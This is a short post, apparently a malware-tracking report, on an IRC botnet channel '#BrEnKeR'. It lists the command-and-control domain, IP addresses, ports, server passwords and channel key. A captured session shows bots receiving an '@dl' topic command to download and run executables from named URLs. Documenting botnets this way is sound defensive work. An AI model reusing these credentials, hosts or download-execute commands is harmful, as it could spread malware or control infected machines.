mecanto571.dyndns.org(irc botnet hosted in Germany Hetzner Online Ag)

Resolved : [mecanto571.dyndns.org] To [178.63.252.56]

Remote Host Port Number
178.63.252.56 26745 PASS google_cache2.tmp or PASS serverpass
64.186.152.219 26745 PASS google_cache2.tmp or PASS serverpass
64.62.181.43 80

Invisible Users: 1417
Channels: 1 channels formed
Clients:I have 1418 clients and 0 servers
Local users: Current Local Users: 1418 Max: 4139
Global users: Current Global Users: 1418 Max: 1677

JOIN #BrEnKeR lukosmon6458347
NICK [BrEnK-XP-USA]322587
USER 3225 “” “TsGh” :3225
NICK new[BrEnK-XP-USA]417752
USER 2532 “” “TsGh” :2532
PRIVMSG #BrEnKeR :[Download]: Executed Successfully

JOIN #BrEnKeR lukosmon6458347
PRIVMSG #BrEnKeR :Downloading: http://brenk909.fileave.com/scvbtytyh.exe to: C:DOCUME~1UserNameLOCALS~1Tempzf.exe
PRIVMSG #BrEnKeR :File running: 136 KB.
PONG :irc.undernet.org

Now talking in #BrEnKeR
Topic On: [ #BrEnKeR ] [ @dl 1 http://brenk909.fileave.com/scvbtytyh.exe ]
Topic By: [ BrEnKeR ]
Modes On: [ #BrEnKeR ] [ +smntMu ]

* The data identified by the following URL was then requested from the remote web server:
o http://brenk909.fileave.com/windowsup.exe

infos about hosting:
http://whois.domaintools.com/64.186.152.219

Categories: Uncategorized